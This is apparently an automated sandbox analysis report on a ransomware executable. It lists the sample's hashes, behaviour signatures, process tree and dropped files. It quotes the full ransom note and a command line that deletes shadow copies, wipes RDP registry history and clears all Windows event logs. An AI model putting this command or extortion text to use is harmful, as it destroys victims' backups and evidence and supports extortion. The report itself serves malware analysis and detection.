Overview

overview

10

Static

static

3

b95a4443bb...1e.exe

windows7-x64

10

b95a4443bb...1e.exe

windows10-2004-x64

10

Resubmissions

07/06/2023, 00:18

230607-alrcyagb74 10

07/06/2023, 00:16

230607-akgr4sgb68 10

Analysis

  • max time kernel
    32s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    07/06/2023, 00:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b95a4443bb8bff80d927ac551a9a5a5cfac3e3e03a5b5737c0e05c75f33ad61e.exe

  • Size

    113KB

  • MD5

    8d9f3e223f8d5e350b87dc0908fee0a5

  • SHA1

    9fe3060e5cbe3a9ab6c3fb3dee40bd6cd385a6f6

  • SHA256

    b95a4443bb8bff80d927ac551a9a5a5cfac3e3e03a5b5737c0e05c75f33ad61e

  • SHA512

    d7ffbcdc3bdb72cb1994aae3178feec0edf0384ca57c9dc32bfa95d55d71ffc0dcce809411da9a410c10a1a12677b218807dcb39ab7bc72e04c6519e32314f30

  • SSDEEP

    1536:1wS0lrtfH16vu2Lwn7iqtjl20VoC6wC+kh9YuikxGHgdyo1dRHPUW:70lRv4LR4j4zCjC+kh9Bikw417vUW

Score
10/10
ransomware

Malware Config

Extracted

Path

C:\HOW_TO_RECOVERY_FILES.txt

Ransom Note
~~~ Hello! Your company has been hacked! ~~~ >>>> Your data are stolen and encrypted >>>> What guarantees that we will not deceive you? We are not a politically motivated group and we do not need anything other than your money. If you pay, we will provide you the programs for decryption and we will delete your data. Life is too short to be sad. Be not sad, money, it is only paper. If we do not give you decrypters, or we do not delete your data after payment, then nobody will pay us in the future. Therefore to us our reputation is very important. We attack the companies worldwide and there is no dissatisfied victim after payment. >>>> You need to contact us by email [email protected] and decrypt some files for free >>>> The data will be published on TOR website if you do not pay the ransom Download and install TOR Browser https://www.torproject.org/ Links for Tor Browser: http://ze677xuzard4lx4iul2yzf5ks4gqqzoulgj5u4n5n4bbbsxjbfr7eayd.onion >>>> Your personal ID: 465638091C7D8ABDB5BCDF6F5793235B9686B3BE85A83CFF57E86D93196AED 7FECFE4D8B6ECC0D3B9E4FAFDD1C56134087C5DD82115B4A10EF3582AB0817 E164083E343F54844C5BAB7E486083AC1FE38C549936C028EFDDCC1A7133C0 5ECD1B2E7D7103DBF6D54C2471D315C755524F85067755707292BC1D56A597 97AE4B32EB8D02BEB62014296BB86DC698277F119E5E178F94A83B3327DAE4 0C9363644F6BCAFD9C7924A2F552BD699E1D57B32BA3C29FC973B58790CE36 19428059968B0869B58129613FB061722E7CAEE8EEFCB017A442EC18E7A993 FADD1AD0CB2BA74856DC7C3612AECA453830BDB723DCF6018C825529E7A039 2493A54BCD2F1C12C2DD5F5465CD2B651B1B9EB74475DC7743F8FBB64B1DB2 8299A65AF80BEFACBCAED610348E8CAAAFF2E766DDC5108DB2217F7B49C4BC 328A60244B0292315A48FEB353309A3A975B3CD62152646522507CE3E5C72D 2387100B5AB95BC5329535FB68818B03AEF1CB19A7D0E2C39D10F768A23008 5375ADFE4B51E4E1B1A27F6011BE29A0E894BD83FDC5EDE5D3A474B7B6563A E149B22F2BF90C4319C270A7678B8469C213C12DA19A57E6E21177F605836D 7B56C0F3E860224CF8D09E7D3EE26824B0CAF14BB9DC40852565B5DBA11A94 D2A9C35F937D28D45CAC14FC8C6ED65FD094FF6E9793DC208EA4AA88D2F252 31F165199BABEA549019D5B4493C48E2DD423FCEA17618F14432342FB19DCC 590C76A6C4B673F960BBAB4C2288D5DC17559896A9A4D4D9CBA28D548F8B86 DEC1D5E086874C5C7C413C763A69AC240A450ED06245524730D669B63719FF DF4CC78D4886B979FB87733E164B3D44A83F7BB4B7650EE18CE734F7CB77AC 373CD36A68D6FC5F9DA0BE04BD9CCF752E41EB791DE60DB5242BFE37BF8A34 38AF83BCFB4E25A18729E7EBFC77BB932D5BF4203D39C931F3A89DE8DD42AD 0AF008A0A6FBAC401441E2842FEB0901CA12CBEF2FF107260CBA31D01C35DE 4BE7F92482FFF1047146A6429904DDA1C1973DC4248B1520F886E367C14BDF 3A8734100ADC6CD6D7D94A226EA59E6E7F22A8A36B9891B0850581841ED7B6 296520C405205A48CD1818BEA04B0CE0A91554DE0BEEA9E883085C49E06344 CE00 >>>> Provide your personal ID in the email >>>> Warning! Do not DELETE or MODIFY any files, it can lead to recovery problems! >>>> Warning! If you do not pay the ransom we will attack your company repeatedly again!
URLs

http://ze677xuzard4lx4iul2yzf5ks4gqqzoulgj5u4n5n4bbbsxjbfr7eayd.onion

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Renames multiple (1328) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Drops desktop.ini file(s) 27 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\b95a4443bb8bff80d927ac551a9a5a5cfac3e3e03a5b5737c0e05c75f33ad61e.exe
    "C:\Users\Admin\AppData\Local\Temp\b95a4443bb8bff80d927ac551a9a5a5cfac3e3e03a5b5737c0e05c75f33ad61e.exe"
    1⤵
    • Modifies extensions of user files
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1816
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" cd %userprofile%\documents\ attrib Default.rdp -s -h del Default.rdp for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1060
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:1752
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:744

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\HOW_TO_RECOVERY_FILES.txt
    Filesize

    2KB

    MD5

    a7df5d0b04949a24ae4e2319a5111a08

    SHA1

    23e43bbf7b6c35d6256d94c247824dfa2f1b7367

    SHA256

    706f048f222cdeedd700d8c4cc161b75a6bab775d8d2b9a588acbade7baa668d

    SHA512

    33bcb315bd2a324496daf616964a9e74d4aad4aa820de18b60791ca1e5f5d80b38704b1aec51fb9905cb5b4b110356bef268d2bfeececd85db506964773e9a52

    Download Submit

  • memory/1816-1302-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/1816-2323-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/1816-3609-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download